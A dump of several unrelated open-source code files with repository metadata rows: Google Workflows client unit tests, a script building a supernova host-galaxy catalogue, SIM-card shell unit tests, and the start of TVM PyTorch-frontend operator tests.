    path = WorkflowsClient.common_folder_path(**expected)
    # Check that the path construction is reversible.
    actual = WorkflowsClient.parse_common_folder_path(path)
    assert expected == actual
def test_common_organization_path():
    """common_organization_path() renders organizations/{organization}."""
    organization = "scallop"
    expected = "organizations/{organization}".format(organization=organization,)
    actual = WorkflowsClient.common_organization_path(organization)
    assert expected == actual
def test_parse_common_organization_path():
    """parse_common_organization_path() inverts common_organization_path()."""
    expected = {
        "organization": "abalone",
    }
    path = WorkflowsClient.common_organization_path(**expected)
    # Check that the path construction is reversible.
    actual = WorkflowsClient.parse_common_organization_path(path)
    assert expected == actual
def test_common_project_path():
    """common_project_path() renders projects/{project}."""
    proj = "squid"
    assert WorkflowsClient.common_project_path(proj) == f"projects/{proj}"
def test_parse_common_project_path():
    """parse_common_project_path() inverts common_project_path()."""
    expected = {
        "project": "clam",
    }
    path = WorkflowsClient.common_project_path(**expected)
    # Check that the path construction is reversible.
    actual = WorkflowsClient.parse_common_project_path(path)
    assert expected == actual
def test_common_location_path():
    """common_location_path() renders projects/{project}/locations/{location}."""
    project = "whelk"
    location = "octopus"
    expected = "projects/{project}/locations/{location}".format(
        project=project, location=location,
    )
    actual = WorkflowsClient.common_location_path(project, location)
    assert expected == actual
def test_parse_common_location_path():
    """parse_common_location_path() inverts common_location_path()."""
    expected = {
        "project": "oyster",
        "location": "nudibranch",
    }
    path = WorkflowsClient.common_location_path(**expected)
    # Check that the path construction is reversible.
    actual = WorkflowsClient.parse_common_location_path(path)
    assert expected == actual
def test_client_with_default_client_info():
    """client_info is forwarded to _prep_wrapped_messages for both client and transport construction."""
    client_info = gapic_v1.client_info.ClientInfo()
    with mock.patch.object(
        transports.WorkflowsTransport, "_prep_wrapped_messages"
    ) as prep:
        client = WorkflowsClient(
            credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
        )
        prep.assert_called_once_with(client_info)
    with mock.patch.object(
        transports.WorkflowsTransport, "_prep_wrapped_messages"
    ) as prep:
        transport_class = WorkflowsClient.get_transport_class()
        transport = transport_class(
            credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
        )
        prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
    """Leaving the async client's context manager closes the gRPC channel exactly once."""
    client = WorkflowsAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc_asyncio",
    )
    with mock.patch.object(
        type(getattr(client.transport, "grpc_channel")), "close"
    ) as close:
        async with client:
            close.assert_not_called()
        close.assert_called_once()
def test_transport_close():
    """Leaving the sync client's context manager closes the underlying channel exactly once."""
    transports = {
        "grpc": "_grpc_channel",
    }
    for transport, close_name in transports.items():
        client = WorkflowsClient(
            credentials=ga_credentials.AnonymousCredentials(), transport=transport
        )
        with mock.patch.object(
            type(getattr(client.transport, close_name)), "close"
        ) as close:
            with client:
                close.assert_not_called()
            close.assert_called_once()
def test_client_ctx():
    """Using the client as a context manager delegates close() to its transport."""
    transports = [
        "grpc",
    ]
    for transport in transports:
        client = WorkflowsClient(
            credentials=ga_credentials.AnonymousCredentials(), transport=transport
        )
        # Test client calls underlying transport.
        with mock.patch.object(type(client.transport), "close") as close:
            close.assert_not_called()
            with client:
                pass
            close.assert_called()
@pytest.mark.parametrize(
    "client_class,transport_class",
    [
        (WorkflowsClient, transports.WorkflowsGrpcTransport),
        (WorkflowsAsyncClient, transports.WorkflowsGrpcAsyncIOTransport),
    ],
)
def test_api_key_credentials(client_class, transport_class):
    """An api_key client option is exchanged for API-key credentials and passed to the transport."""
    with mock.patch.object(
        google.auth._default, "get_api_key_credentials", create=True
    ) as get_api_key_credentials:
        mock_cred = mock.Mock()
        get_api_key_credentials.return_value = mock_cred
        options = client_options.ClientOptions()
        options.api_key = "api_key"
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(client_options=options)
            patched.assert_called_once_with(
                credentials=mock_cred,
                credentials_file=None,
                host=client.DEFAULT_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
| googleapis/python-workflows | tests/unit/gapic/workflows_v1beta/test_workflows.py | Python | apache-2.0 | 94,960 | [
"Octopus"
] | cd6963ce83b39b858627fb76ca85b4a73592aefd97c0406dbc4b6a460f2093f8 |
#!/usr/local/bin/python3.5
import json
import re
import os
import math
import codecs
import urllib
import requests
import ads
import gzip
import statistics
import time
from html import unescape
from glob import glob
from tqdm import tqdm
from collections import OrderedDict
from astropy.coordinates import SkyCoord as coord
from astropy import units as un
from astropy.time import Time as astrotime
from copy import deepcopy
from math import sqrt
from digits import *
hosts = OrderedDict()
def get_event_filename(name):
    """Return a filesystem-safe file name for *name* (slashes become underscores)."""
    return name.replace('/', '_')
def touch(fname, times=None):
    """Ensure *fname* exists and stamp its access/modification times.

    Opening in append mode creates the file when absent without touching
    existing content; ``times=None`` means "now" (see ``os.utime``).
    """
    handle = open(fname, 'a')
    try:
        os.utime(fname, times)
    finally:
        handle.close()
# Read the list of repository folders, then collect every event JSON file
# (plain or gzip-compressed) across those sibling repositories.
with open('rep-folders.txt', 'r') as f:
    repfolders = f.read().splitlines()
files = []
for rep in repfolders:
    files += glob('../' + rep + "/*.json") + glob('../' + rep + "/*.json.gz")
for fcnt, eventfile in enumerate(tqdm(sorted(files, key=lambda s: s.lower()))):
#if fcnt > 1000:
# break
fileeventname = os.path.splitext(os.path.basename(eventfile))[0].replace('.json','')
if not os.path.isfile(eventfile):
continue
if eventfile.split('.')[-1] == 'gz':
with gzip.open(eventfile, 'rt') as f:
filetext = f.read()
else:
with open(eventfile, 'r') as f:
filetext = f.read()
item = json.loads(filetext, object_pairs_hook=OrderedDict)
item = item[list(item.keys())[0]]
if 'host' in item:
hngs = [x['value'] for x in item['host'] if ((x['kind'] != 'cluster') if 'kind' in x else True)]
hncs = [x['value'] for x in item['host'] if ((x['kind'] == 'cluster') if 'kind' in x else False)]
hng = ''
hnc = ''
for ho in hosts:
hog = [x for x in hosts[ho]['host'] if hosts[ho]['kind'] != 'cluster']
hoc = [x for x in hosts[ho]['host']]
if len(list(set(hngs).intersection(hog))):
hng = ho
hosts[ho]['host'] = list(set(hosts[ho]['host'] + hngs))
if len(list(set(hncs).intersection(hoc))):
hnc = ho
hosts[ho]['host'] = list(set(hosts[ho]['host'] + hncs + hngs))
if hng and hnc:
break
if not hng and hngs:
hng = hngs[0]
hosts[hng] = OrderedDict([('host', hngs), ('kind', 'galaxy'), ('events', []), ('eventdates', []),
('types', []), ('photocount', 0), ('spectracount', 0), ('lumdist', ''),
('redshift', ''), ('hostra', ''), ('hostdec', '')])
if not hnc and hncs:
hnc = hncs[0]
hosts[hnc] = OrderedDict([('host', hncs + hngs), ('kind', 'cluster'), ('events', []), ('eventdates', []),
('types', []), ('photocount', 0), ('spectracount', 0), ('lumdist', ''),
('redshift', ''), ('hostra', ''), ('hostdec', '')])
for hi, hn in enumerate([hng, hnc]):
if not hn:
continue
hosts[hn]['events'].append({'name':item['name'],'img':('ra' in item and 'dec' in item)})
if (not hosts[hn]['lumdist'] or '*' in hosts[hn]['lumdist']) and 'lumdist' in item:
ldkinds = [x['kind'] if 'kind' in x else '' for x in item['lumdist']]
try:
ind = ldkinds.index('host')
except ValueError:
hosts[hn]['lumdist'] = item['lumdist'][0]['value'] + '*'
else:
hosts[hn]['lumdist'] = item['lumdist'][ind]['value']
if (not hosts[hn]['redshift'] or '*' in hosts[hn]['redshift']) and 'redshift' in item:
zkinds = [x['kind'] if 'kind' in x else '' for x in item['redshift']]
try:
ind = zkinds.index('host')
except ValueError:
hosts[hn]['redshift'] = item['redshift'][0]['value'] + '*'
else:
hosts[hn]['redshift'] = item['redshift'][ind]['value']
if not hosts[hn]['hostra'] and 'hostra' in item:
hosts[hn]['hostra'] = item['hostra'][0]['value']
if not hosts[hn]['hostdec'] and 'hostdec' in item:
hosts[hn]['hostdec'] = item['hostdec'][0]['value']
if 'discoverdate' in item and item['discoverdate']:
datestr = item['discoverdate'][0]['value'].replace('/', '-')
if datestr.count('-') == 1:
datestr += '-01'
elif datestr.count('-') == 0:
datestr += '-01-01'
try:
hosts[hn]['eventdates'].append(astrotime(datestr, format = 'isot').unix)
except:
hosts[hn]['eventdates'].append(float("inf"))
else:
hosts[hn]['eventdates'].append(float("inf"))
if 'claimedtype' in item:
cts = []
for ct in item['claimedtype']:
sct = ct['value'].strip('?')
if sct:
cts.append(sct)
hosts[hn]['types'] = list(set(hosts[hn]['types']).union(cts))
if 'photometry' in item:
hosts[hn]['photocount'] += len(item['photometry'])
if 'spectra' in item:
hosts[hn]['spectracount'] += len(item['spectra'])
curtime = time.time()
centrate = 100.0*365.25*24.0*60.0*60.0
for hn in hosts:
finitedates = sorted([x for x in hosts[hn]['eventdates'] if x != float("inf")])
if len(finitedates) >= 2:
datediff = curtime - finitedates[0]
lamb = float(len(finitedates))/(curtime - finitedates[0])*centrate
hosts[hn]['rate'] = (pretty_num(lamb, sig = 3) + ',' +
pretty_num(lamb/sqrt(float(len(finitedates))), sig = 3))
else:
hosts[hn]['rate'] = ''
hosts[hn]['events'] = [x for (y,x) in sorted(zip(hosts[hn]['eventdates'], hosts[hn]['events']), key = lambda ev: ev[0])]
del(hosts[hn]['eventdates'])
# Convert to array since that's what datatables expects
hosts = list(hosts.values())
jsonstring = json.dumps(hosts, indent='\t', separators=(',', ':'), ensure_ascii=False)
with open('../hosts.json', 'w') as f:
f.write(jsonstring)
minjsonstring = json.dumps(hosts, separators=(',', ':'), ensure_ascii=False)
with gzip.open("../hosts.min.json.gz", 'wt') as fff:
touch("../hosts.min.json")
fff.write(minjsonstring)
| jparrent/sne | scripts/make-host-catalog.py | Python | mit | 6,395 | [
"Galaxy"
] | e75c3ae98c88c482e576f389cdbffcc81d9abfc5fc29a434d74d7b15f94885f4 |
#!/usr/bin/python
# LICENSE: GPL2
# (c) 2015 Kamil Wartanowicz
import sys,os.path
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
from sim import sim_router
from sim import sim_card
from sim import sim_shell
from util import hextools
from util import types_g
from util import types
import unittest
import logging
from sim import sim_reader
from sim import sim_ctrl_2g
from sim import sim_ctrl_3g
MODE_SIM = sim_reader.MODE_PYSCARD
SIM_TYPE = types.TYPE_USIM
class TestSimShell(unittest.TestCase):
    """Exercises sim_shell commands (read/cd/ls/create/delete/resize/extend)
    against a physical SIM card in the first attached reader."""

    @classmethod
    def setUpClass(cls):
        """Connect to the first reader and start the SIM router/shell."""
        cls.simCard = sim_card.SimCard(mode=MODE_SIM)
        cls.simCard.removeAllReaders()
        try:
            cls.simCard.connect(0)
        except Exception as e:
            cls.simCard.stop()
            if "no card in reader" in str(e):
                raise Exception("No card in reader")
            # Fix: any other connect failure used to be silently swallowed,
            # letting the whole suite run against a dead reader.
            raise
        cls.simRouter = sim_router.SimRouter(cards=[cls.simCard], type=SIM_TYPE, mode=sim_router.SIMTRACE_OFFLINE)
        cls.simRouter.run(mode=sim_router.ROUTER_MODE_DISABLED)
        cls.shell = cls.simRouter.shell

    def test_01_read_iccid(self):
        """ICCID (EF 2FE2) must be readable and at least 10 chars long."""
        status, data = self.shell.read("/2FE2")
        self.shell.assertOk(status, data)
        value = types.getDataValue(data)
        valueLength = len(value)
        self.assertGreater(valueLength, 9, "Invalid ICCID length")

    def test_02_read_imsi(self):
        """IMSI must decode identically via every addressing style."""
        path = "/ADF0/EF_IMSI"
        logging.info("test path: %s" %path)
        status, data1 = self.shell.readi(path)
        self.shell.assertOk(status, data1)
        path = "/7F20/EF_IMSI"
        logging.info("test path: %s" %path)
        status, data2 = self.shell.readi(path)
        self.shell.assertOk(status, data2)
        status, data = self.shell.cd("/")
        self.shell.assertOk(status, data)
        path = "EF_IMSI"
        logging.info("test path: %s" %path)
        status, data3 = self.shell.readi(path)
        self.shell.assertOk(status, data3)
        path = "/ADF_USIM"
        logging.info("test path: %s" %path)
        status, data = self.shell.cd(path)
        self.shell.assertOk(status, data)
        path = "./6F07"
        logging.info("test path: %s" %path)
        status, data4 = self.shell.readi(path)
        self.shell.assertOk(status, data4)
        self.assertEqual(data1, data2)
        self.assertEqual(data1, data3)
        self.assertEqual(data1, data4)

    def test_03_read_imsi_raw(self):
        """Raw IMSI reads must agree regardless of the path used."""
        status, data1 = self.shell.read("/ADF0/EF_IMSI")
        self.shell.assertOk(status, data1)
        status, data = self.shell.cd("/")
        self.shell.assertOk(status, data)
        status, data2 = self.shell.read("EF_IMSI")
        self.shell.assertOk(status, data2)
        imsi1 = types.getDataValue(data1)
        imsi2 = types.getDataValue(data2)
        self.assertEqual(imsi1, imsi2)
        imsiRawLength = len(imsi1)
        self.assertGreater(imsiRawLength, 14+3, "Invalid imsi raw length")

    def test_04_get_plmn(self):
        """PLMN (5-6 digits) must be a prefix contained in the IMSI."""
        status, data1 = self.shell.get_plmn()
        self.shell.assertOk(status, data1)
        self.assertGreaterEqual(len(data1), 5*2)
        self.assertLessEqual(len(data1), 6*2)
        status, data2 = self.shell.readi("EF_IMSI")
        self.shell.assertOk(status, data2)
        self.assertTrue(data1 in data2)

    def test_05_read_arr(self):
        """Access-rule file EF_ARR (2F06) must be readable."""
        status, data = self.shell.read("/2F06")
        self.shell.assertOk(status, data)

    def test_06_create_file(self):
        """Create and delete a DF and an EF using absolute paths."""
        dirPath = "/DEAD/"
        try:
            # Best-effort cleanup of leftovers from a previous run.
            self.shell.delete(dirPath)
        except Exception:
            pass
        status, out = self.shell.create(dirPath)
        self.shell.assertOk(status, out)
        status, out = self.shell.delete(dirPath)
        self.shell.assertOk(status, out)
        dirPath = "/ADF0/DEAD/"
        filePath = "/ADF0/DEAD/BEEF"
        try:
            self.shell.delete(dirPath)
        except Exception:
            pass
        status, out = self.shell.create(dirPath)
        self.shell.assertOk(status, out)
        status, out = self.shell.create(filePath)
        self.shell.assertOk(status, out)
        status, out = self.shell.delete(filePath)
        self.shell.assertOk(status, out)
        status, out = self.shell.delete(dirPath)
        self.shell.assertOk(status, out)

    def test_07_create_file_relative(self):
        """Create and delete DFs and EFs using relative paths."""
        dirPath = "./DEAD/"
        filePath = "./BEEF"
        dirPath2 = "./DEAF/"
        try:
            # Best-effort cleanup of leftovers from a previous run.
            self.shell.delete(dirPath)
        except Exception:
            pass
        status, out = self.shell.create(dirPath)
        self.shell.assertOk(status, out)
        status, out = self.shell.create(filePath)
        self.shell.assertOk(status, out)
        status, out = self.shell.create(dirPath2)
        self.shell.assertOk(status, out)
        status, out = self.shell.create(filePath)
        self.shell.assertOk(status, out)
        status, out = self.shell.delete(dirPath2)
        self.shell.assertOk(status, out)
        status, out = self.shell.delete(dirPath)
        self.shell.assertOk(status, out)

    def test_08_create_adf(self):
        """Create an ADF at the next free slot after the EF_DIR records."""
        # Get number of EF_DIR records
        status, data = self.shell.read("/2F00")
        self.shell.assertOk(status, data)
        numOfRecords = len(data.split(';')) - 1
        # Use the next free Id
        dirPath = "/ADF%d/" % numOfRecords
        try:
            # Best-effort cleanup of leftovers from a previous run.
            self.shell.delete(dirPath)
        except Exception:
            pass
        status, out = self.shell.create(dirPath)
        if status == "status NOK":
            raise unittest.SkipTest(
                """Known issue: ADF creation doesn't work for some SIM cards
                (INCORRECT_PARAMETER_IN_DATA_FIELD is returned)""")
        #self.shell.assertOk(status, out)
        status, out = self.shell.delete(dirPath)
        self.shell.assertOk(status, out)

    def test_09_pwd(self):
        """pwd must report the directory selected by cd."""
        dirPath = "/7F10/5F3A"
        name = "DF_PHONEBOOK"
        status, out = self.shell.cd(dirPath)
        self.shell.assertOk(status, out)
        status, out = self.shell.pwd()
        self.shell.assertOk(status, out)
        path = types.getDataValue(out)
        #compare to directory
        self.assertEqual(path, "path=%s/,name=%s,simId=0" %(dirPath, name))

    def test_10_ls(self):
        """ls must list children of the selected directory."""
        dirPath = "/"
        status, out = self.shell.cd(dirPath)
        self.shell.assertOk(status, out)
        status, out = self.shell.ls()
        self.shell.assertOk(status, out)
        files = types.getDataValue(out)
        self.assertTrue(files)
        dirPath = "/7F10"
        status, out = self.shell.cd(dirPath)
        self.shell.assertOk(status, out)
        status, out = self.shell.ls()
        self.shell.assertOk(status, out)
        files = types.getDataValue(out)
        self.assertTrue("5F3A/" in files, "Files: %s" %files)

    def test_11_resize(self):
        """Resize a linear-fixed EF up (with a pattern) and back down."""
        filePath = "/ADF0/DEAD/BEEF"
        parentPath = types.parentDirFromPath(filePath) + '/'
        # Cleanup
        try:
            self.shell.delete(parentPath)
        except Exception:
            pass
        # Create temporary dir and file (linear)
        fileType = types_g.fileDescriptor.LINEAR_FIXED_STRUCTURE
        fileSize = 0x30
        recordLength = 0x10
        status, out = self.shell.create(filePath,
                                        "fileType=%X,fileSize=%X,recordLength=%X" \
                                        % (fileType, fileSize, recordLength))
        self.shell.assertOk(status, out)
        # Increase the size of the file (by 2 new records) with a pattern
        newFileSize = fileSize + recordLength * 2
        pattern = types.addTrailingBytes('', 0xA5, recordLength-4) # not the whole record length
        status, out = self.shell.resize(filePath, hex(newFileSize), pattern)
        self.shell.assertOk(status, out)
        # Check the data after resize
        status, data = self.shell.read(filePath)
        self.shell.assertOk(status, data)
        value = types.getDataValue(data).replace(';', '')
        self.assertEqual(len(value)/2, newFileSize)
        # Decrease the size of the file to one record
        status, out = self.shell.resize(filePath, hex(recordLength))
        self.shell.assertOk(status, out)
        status, out = self.shell.delete(parentPath)
        self.shell.assertOk(status, out)

    @unittest.skip("The EXTEND command is probably only supported by Gemalto")
    def test_12_extend(self):
        """Extend a linear-fixed EF by whole records (vendor-specific)."""
        filePath = "/ADF0/DEAD/BEEF"
        parentPath = types.parentDirFromPath(filePath) + '/'
        # Cleanup
        try:
            self.shell.delete(parentPath)
        except Exception:
            pass
        # Create temporary dir and file (linear)
        fileType = types_g.fileDescriptor.LINEAR_FIXED_STRUCTURE
        fileSize = 0x30
        recordLength = 0x10
        status, out = self.shell.create(filePath,
                                        "fileType=%X,fileSize=%X,recordLength=%X" \
                                        % (fileType, fileSize, recordLength))
        self.shell.assertOk(status, out)
        # Increase the size of the file (by 2 new records) with a pattern
        numOfRecordsToExtend = 2
        status, out = self.shell.extend(filePath, numOfRecordsToExtend)
        self.shell.assertOk(status, out)
        # Check the data after extension
        status, data = self.shell.read(filePath)
        self.shell.assertOk(status, data)
        value = types.getDataValue(data).replace(';', '')
        self.assertEqual(len(value)/2, fileSize + numOfRecordsToExtend * recordLength)
        status, out = self.shell.delete(parentPath)
        self.shell.assertOk(status, out)

    @classmethod
    def tearDownClass(cls):
        """Release the card reader."""
        cls.simCard.stop()
if __name__ == "__main__":
    # Plain-text INFO logging keeps the shell command traces readable.
    logging.basicConfig(level=logging.INFO, format='%(message)s')
    unittest.main()
"ADF"
] | d96d6bc109c208ad680de55934e060bbcddf889a78083e4481896ed8d8b1cbf3 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""Unit tests for various models and operators"""
from time import time
import os
import sys
from scipy.stats import t as tdistr
import numpy as np
import torch
import torchvision
from torch.nn import Module
import tvm
from tvm import relay
from tvm.contrib import graph_runtime
from tvm.contrib.nvcc import have_fp16
import tvm.testing
from packaging import version as package_version
sys.setrecursionlimit(10000)
def list_ops(expr):
    """Return the distinct relay operators referenced by *expr*,
    in first-visit order."""

    class OpLister(tvm.relay.ExprVisitor):
        def visit_op(self, expr):
            if expr not in self.node_set:
                # Fix: node_set was never populated (and was a dict), so the
                # membership test above was always False and could not
                # deduplicate; record each op the first time it is seen.
                self.node_set.add(expr)
                self.node_list.append(expr)
            return super().visit_op(expr)

        def list_nodes(self, expr):
            self.node_set = set()
            self.node_list = []
            self.visit(expr)
            return self.node_list

    return OpLister().list_nodes(expr)
def assert_shapes_match(tru, est):
    """Raise AssertionError when the two arrays' shapes differ."""
    if tru.shape == est.shape:
        return
    raise AssertionError("Output shapes {} and {} don't match".format(tru.shape, est.shape))
def load_torchvision(model_name):
    """Given a model name, returns a Torchvision model in eval mode as well
    as an example input."""
    with torch.no_grad():
        if model_name.startswith("inception"):
            # Inception networks take 299x299 inputs with 0.5/0.5 normalization.
            height = width = 299
            mean = [0.5, 0.5, 0.5]
            std = [0.5, 0.5, 0.5]
        else:
            # Standard ImageNet preprocessing for all other torchvision models.
            height = width = 224
            mean = [0.485, 0.456, 0.406]
            std = [0.229, 0.224, 0.225]
        input_shape = [1, 3, height, width]
        input_data = torch.randn(input_shape).float()
        # Normalize the random example input channel by channel.
        for channel in range(3):
            input_data[:, channel] -= mean[channel]
            input_data[:, channel] /= std[channel]
        if model_name.startswith("googlenet"):
            # googlenet needs aux_logits=True to load its pretrained weights.
            model = getattr(torchvision.models, model_name)(pretrained=True, aux_logits=True)
        else:
            model = getattr(torchvision.models, model_name)(pretrained=True)
        model = model.float().eval()
        return model, [input_data]
def load_pretrainedmodels(model_name):
    """Given a model name, returns a pretrainedmodels.pytorch model in eval
    mode as well as an example input."""
    import pretrainedmodels  # https://github.com/Cadene/pretrained-models.pytorch
    model = getattr(pretrainedmodels, model_name)().float().eval()
    # Each pretrainedmodels model publishes its own input_size/mean/std.
    input_shape = [1, *model.input_size]
    input_data = torch.rand(input_shape).float() * 256
    for channel in range(3):
        input_data[:, channel] -= model.mean[channel]
        input_data[:, channel] /= model.std[channel]
    return model, [input_data]
def load_model(model_name):
    """Given a model name, returns a model as well as an example input.

    Torchvision models are tried first; pretrainedmodels.pytorch is the
    fallback source."""
    if hasattr(torchvision.models, model_name):
        return load_torchvision(model_name)
    try:
        import pretrainedmodels
        if hasattr(pretrainedmodels, model_name):
            return load_pretrainedmodels(model_name)
    except ModuleNotFoundError:
        raise ModuleNotFoundError("Please install pretrainedmodels.pytorch")
    raise RuntimeError("Model not supported")
def confidence_interval(mean, stdev, count, alpha=0.01):
    """Returns the lower and upper bounds of the confidence interval of a random
    variable. Confidence is 1 - alpha (default confidence is 99%)."""
    # Student-t critical value for a two-sided interval with count-1 dof.
    critical = tdistr.ppf(1 - alpha / 2, count - 1)
    margin = critical * stdev / np.sqrt(count)
    return mean - margin, mean + margin
def measure_latency(model, input_shapes, output_shapes, thresh, dryruns=40):
    """Compute the latency of the given model.

    Repeatedly times single runs until the half-width of the 99% confidence
    interval of the mean latency drops below *thresh*, then returns the
    interval midpoint (seconds).  Loops forever if that never happens.
    """
    latencies = []
    count = 0
    while True:
        if isinstance(model, Module):
            # PyTorch path: time one forward pass on fresh random inputs.
            input_data = [torch.rand(shape).float() for shape in input_shapes]
            if torch.cuda.is_available():
                input_data = list(map(lambda x: x.cuda(), input_data))
                model = model.cuda()
            t_start = time()
            with torch.no_grad():
                model(*input_data)
            t_end = time()
            # NOTE(review): unlike the TVM path below, no warm-up iterations
            # are discarded here -- confirm this asymmetry is intended.
            latencies.append(t_end - t_start)
        else:
            # TVM graph-runtime path: feed random inputs, run, fetch outputs.
            input_data = {}
            for i, shape in enumerate(input_shapes):
                name = "input" + str(i)
                arr = np.random.random(shape).astype("float32")
                input_data[name] = tvm.nd.array(arr)
            t_start = time()
            model.set_input(**input_data)
            model.run()
            for i, shape in enumerate(output_shapes):
                arr = np.zeros(shape).astype("float32")
                model.get_output(i, tvm.nd.array(arr))
            t_end = time()
            count += 1
            if count < dryruns:
                # Discard the first `dryruns` runs as warm-up.
                continue
            latencies.append(t_end - t_start)
        mean = np.mean(latencies)
        stdev = np.std(latencies)
        sample_size = len(latencies)
        if sample_size > dryruns:
            # Stop once the confidence interval half-width is below thresh.
            lower, upper = confidence_interval(mean, stdev, sample_size)
            est = (upper + lower) / 2
            err = (upper - lower) / 2
            if err < thresh:
                return est
def verify_model(model_name, input_data=None, custom_convert_map=None, rtol=1e-5, atol=1e-5):
    """Assert that the output of a compiled model matches with that of its
    baseline.

    *model_name* is either the name of a torchvision/pretrainedmodels model
    or an already-built torch.nn.Module; *input_data* is a tensor or a list
    of tensors fed to both the PyTorch baseline and the TVM-compiled model.

    Fix: the defaults were mutable ([] and {}) -- a classic Python pitfall;
    None sentinels keep the call interface identical without shared state.
    """
    if input_data is None:
        input_data = []
    if custom_convert_map is None:
        custom_convert_map = {}
    if isinstance(model_name, str):
        baseline_model, baseline_input = load_model(model_name)
    elif isinstance(input_data, list):
        baseline_model = model_name
        baseline_input = input_data
    elif isinstance(input_data, torch.Tensor) or len(input_data.shape) == 0:
        baseline_model = model_name
        baseline_input = [input_data]
    else:
        assert False, "Unexpected input format"
    if torch.cuda.is_available():
        if isinstance(baseline_model, torch.nn.Module):
            baseline_model = baseline_model.cuda()
        baseline_input = [inp.cuda() for inp in baseline_input]
    # Run the PyTorch baseline once to collect reference outputs.
    with torch.no_grad():
        baseline_outputs = baseline_model(*baseline_input)
    if isinstance(baseline_outputs, tuple):
        baseline_outputs = tuple(out.cpu().numpy() for out in baseline_outputs)
    else:
        baseline_outputs = (baseline_outputs.cpu().numpy(),)
    # Trace the model so the relay frontend can import it.
    trace = torch.jit.trace(baseline_model, baseline_input)
    if isinstance(baseline_model, torch.nn.Module):
        trace = trace.float().eval()
        if torch.cuda.is_available():
            trace = trace.cuda()
        else:
            trace = trace.cpu()
    input_names = ["input{}".format(idx) for idx, inp in enumerate(baseline_input)]
    input_shapes = list(zip(input_names, [inp.shape for inp in baseline_input]))
    mod, params = relay.frontend.from_pytorch(trace, input_shapes, custom_convert_map)
    compiled_input = dict(zip(input_names, [inp.cpu().numpy() for inp in baseline_input]))
    # Build and run on every enabled TVM target, comparing each output.
    with tvm.transform.PassContext(opt_level=3):
        for target, ctx in tvm.testing.enabled_targets():
            relay_graph, relay_lib, relay_params = relay.build(mod, target=target, params=params)
            relay_model = graph_runtime.create(relay_graph, relay_lib, ctx)
            relay_model.set_input(**relay_params)
            for name, inp in compiled_input.items():
                relay_model.set_input(name, inp)
            relay_model.run()
            for i, baseline_output in enumerate(baseline_outputs):
                compiled_output = relay_model.get_output(i).asnumpy()
                assert_shapes_match(baseline_output, compiled_output)
                tvm.testing.assert_allclose(baseline_output, compiled_output, rtol=rtol, atol=atol)
    # Release references so repeated calls do not accumulate GPU memory.
    del model_name
    del baseline_model
    torch.cuda.empty_cache()
# Single operator tests
@tvm.testing.uses_gpu
def test_forward_pixel_shuffle():
    """PixelShuffle with upscale factors 2, 3 and 4 on a 144-channel input."""
    torch.set_grad_enabled(False)
    data = torch.rand([1, 144, 16, 16]).float()
    for upscale in (2, 3, 4):
        verify_model(torch.nn.PixelShuffle(upscale).float().eval(), input_data=data)
@tvm.testing.uses_gpu
def test_forward_add():
    """Add: tensor+tensor, tensor+scalar, tensor+const tensor, tensor+0-d tensor."""
    torch.set_grad_enabled(False)
    input_shape = [10]
    class Add1(Module):
        def forward(self, *args):
            return args[0] + args[0]
    class Add2(Module):
        def forward(self, *args):
            return args[0] + 1
    class Add3(Module):
        def forward(self, *args):
            ones = torch.ones(input_shape, dtype=torch.float)
            if torch.cuda.is_available():
                ones = ones.cuda()
            return args[0] + ones
    class Add4(Module):
        def forward(self, *args):
            # 0-d (scalar) tensor operand exercises broadcasting.
            ones = torch.ones([], dtype=torch.float)
            if torch.cuda.is_available():
                ones = ones.cuda()
            return args[0] + ones
    input_data = torch.rand(input_shape).float()
    verify_model(Add1().float().eval(), input_data=input_data)
    verify_model(Add2().float().eval(), input_data=input_data)
    verify_model(Add3().float().eval(), input_data=input_data)
    verify_model(Add4().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_subtract():
    """Subtract: tensor-tensor, tensor-scalar, tensor-const tensor, tensor-0-d tensor."""
    torch.set_grad_enabled(False)
    input_shape = [10]
    class Subtract1(Module):
        def forward(self, *args):
            return args[0] - args[0]
    class Subtract2(Module):
        def forward(self, *args):
            return args[0] - 1
    class Subtract3(Module):
        def forward(self, *args):
            ones = torch.ones(input_shape)
            if torch.cuda.is_available():
                ones = ones.cuda()
            return args[0] - ones
    class Subtract4(Module):
        def forward(self, *args):
            # 0-d (scalar) tensor operand exercises broadcasting.
            ones = torch.ones([])
            if torch.cuda.is_available():
                ones = ones.cuda()
            return args[0] - ones
    input_data = torch.rand(input_shape).float()
    verify_model(Subtract1().float().eval(), input_data=input_data)
    verify_model(Subtract2().float().eval(), input_data=input_data)
    verify_model(Subtract3().float().eval(), input_data=input_data)
    verify_model(Subtract4().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_multiply():
    """Multiply: tensor*tensor, tensor*scalar, tensor*const tensor, tensor*0-d tensor."""
    torch.set_grad_enabled(False)
    input_shape = [10]
    class Multiply1(Module):
        def forward(self, *args):
            return args[0] * args[0]
    class Multiply2(Module):
        def forward(self, *args):
            return args[0] * 1.0
    class Multiply3(Module):
        def forward(self, *args):
            ones = torch.ones(input_shape)
            if torch.cuda.is_available():
                ones = ones.cuda()
            return args[0] * ones
    class Multiply4(Module):
        def forward(self, *args):
            # 0-d (scalar) tensor operand exercises broadcasting.
            ones = torch.ones([])
            if torch.cuda.is_available():
                ones = ones.cuda()
            return args[0] * ones
    input_data = torch.rand(input_shape).float()
    verify_model(Multiply1().float().eval(), input_data=input_data)
    verify_model(Multiply2().float().eval(), input_data=input_data)
    verify_model(Multiply3().float().eval(), input_data=input_data)
